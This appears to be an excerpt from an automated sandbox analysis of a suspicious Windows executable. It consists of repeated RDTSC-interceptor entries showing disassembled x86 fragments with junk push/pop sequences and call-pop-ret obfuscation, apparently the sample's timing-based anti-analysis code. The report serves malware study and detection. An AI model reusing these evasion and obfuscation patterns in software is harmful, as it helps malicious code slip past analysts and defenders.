Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC78F8 second address: AC78FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACA780 second address: ACA785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACA785 second address: ACA78A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACADB3 second address: ACADE0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6FA0B8950Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA0B89519h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACADE0 second address: ACAE01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6FA127EBE1h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACAE01 second address: ACAE0B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA0B8950Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACD09B second address: ACD0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACD0A0 second address: ACD0C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F6FA0B89506h 0x00000009 jmp 00007F6FA0B89513h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ACD0C3 second address: ACD0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5CC5 second address: AD5CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B8950Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD50FD second address: AD5138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA127EBE7h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F6FA127EBE2h 0x00000015 jo 00007F6FA127EBDEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5138 second address: AD513E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5810 second address: AD5815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5815 second address: AD581D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD581D second address: AD583D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6FA127EBE7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5AF6 second address: AD5AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5AFC second address: AD5B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5B00 second address: AD5B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5B04 second address: AD5B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5B11 second address: AD5B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD5B17 second address: AD5B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6FA127EBE5h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F6FA127EBDDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD63F3 second address: AD63F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD63F7 second address: AD641D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 341D827Fh 0x0000000e mov edi, 5882A180h 0x00000013 call 00007F6FA127EBD9h 0x00000018 jnp 00007F6FA127EBE0h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD641D second address: AD6469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6FA0B89512h 0x00000010 popad 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jg 00007F6FA0B89513h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jp 00007F6FA0B8950Ah 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d pop ecx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD6469 second address: AD646F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD6914 second address: AD691E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6FA0B89506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD691E second address: AD6937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD6937 second address: AD693B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD7163 second address: AD7167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD71E6 second address: AD71EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD71EC second address: AD71F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD7413 second address: AD7419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD94C5 second address: AD94CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD94CB second address: AD94CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AD8341 second address: AD8348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADAC80 second address: ADAC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADAD1A second address: ADAD2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F6FA127EBE4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADB6AF second address: ADB736 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F6FA0B89508h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+12B49221h], ebx 0x0000002c mov di, si 0x0000002f mov dword ptr [ebp+129C2B4Eh], edx 0x00000035 push 00000000h 0x00000037 mov si, ax 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F6FA0B89508h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 xchg eax, ebx 0x00000057 pushad 0x00000058 jmp 00007F6FA0B89517h 0x0000005d push eax 0x0000005e push edx 0x0000005f jl 00007F6FA0B89506h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADB736 second address: ADB750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F6FA127EBD8h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADC197 second address: ADC1E0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA0B89508h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+129C3207h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F6FA0B89508h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f add dword ptr [ebp+12B6D821h], edx 0x00000035 push 00000000h 0x00000037 mov esi, ebx 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADC1E0 second address: ADC1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADC1E6 second address: ADC1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F6FA0B89506h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADC1FD second address: ADC203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADCB8C second address: ADCB9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADD9EB second address: ADDA09 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6FA127EBD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA127EBDEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADDA09 second address: ADDA41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 je 00007F6FA0B89506h 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+129C1C0Eh] 0x00000016 push 00000000h 0x00000018 mov si, bx 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+129C3459h], edi 0x00000023 xchg eax, ebx 0x00000024 ja 00007F6FA0B8950Eh 0x0000002a push eax 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADDA41 second address: ADDA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADE442 second address: ADE44C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A96E1D second address: A96E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA127EBDEh 0x00000008 jmp 00007F6FA127EBDBh 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ADEC6F second address: ADEC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE37B8 second address: AE37BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE3E65 second address: AE3E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F6FA0B89506h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE3E72 second address: AE3E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE4E92 second address: AE4E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE4E98 second address: AE4E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE4E9C second address: AE4EB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA0B8950Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE6FAF second address: AE6FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE6FB3 second address: AE6FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE6FB7 second address: AE6FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE7506 second address: AE75BE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c jnp 00007F6FA0B89522h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F6FA0B89508h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, eax 0x00000030 jmp 00007F6FA0B89517h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F6FA0B89508h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 adc di, 9E96h 0x00000056 xchg eax, esi 0x00000057 jmp 00007F6FA0B89514h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F6FA0B8950Bh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE75BE second address: AE75C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE75C2 second address: AE75C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9473 second address: AE9477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE873E second address: AE8747 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE8747 second address: AE87B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jno 00007F6FA127EBD9h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F6FA127EBD8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+12B4D58Ah] 0x00000036 mov edi, ecx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+129C192Ch], eax 0x00000045 mov eax, dword ptr [ebp+129C07F1h] 0x0000004b sub dword ptr [ebp+12B43A79h], esi 0x00000051 push FFFFFFFFh 0x00000053 push ebx 0x00000054 sub bl, FFFFFF8Ch 0x00000057 pop edi 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jns 00007F6FA127EBDCh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEA4CB second address: AEA538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jp 00007F6FA0B89506h 0x0000000f jmp 00007F6FA0B89514h 0x00000014 popad 0x00000015 pop edi 0x00000016 nop 0x00000017 sbb ebx, 6FB506FAh 0x0000001d jmp 00007F6FA0B89511h 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+12B6A5FEh], edi 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+12B43A79h], edx 0x00000032 xchg eax, esi 0x00000033 jmp 00007F6FA0B89514h 0x00000038 push eax 0x00000039 jnc 00007F6FA0B89527h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9600 second address: AE9604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9604 second address: AE961D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89515h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE961D second address: AE9622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9622 second address: AE96D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6FA0B89506h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6FA0B89508h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov bh, 19h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov ebx, dword ptr [ebp+129C2B23h] 0x00000039 clc 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F6FA0B89508h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b sub dword ptr [ebp+129C2C0Eh], edx 0x00000061 mov eax, dword ptr [ebp+129C0609h] 0x00000067 jmp 00007F6FA0B89518h 0x0000006c push FFFFFFFFh 0x0000006e mov edi, edx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 pushad 0x00000075 popad 0x00000076 jmp 00007F6FA0B89513h 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEB561 second address: AEB565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEB565 second address: AEB56F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEB56F second address: AEB573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEDB60 second address: AEDB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF000B second address: AF000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF000F second address: AF0013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEEF04 second address: AEEF0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF3E55 second address: AF3E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF1FDF second address: AF1FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
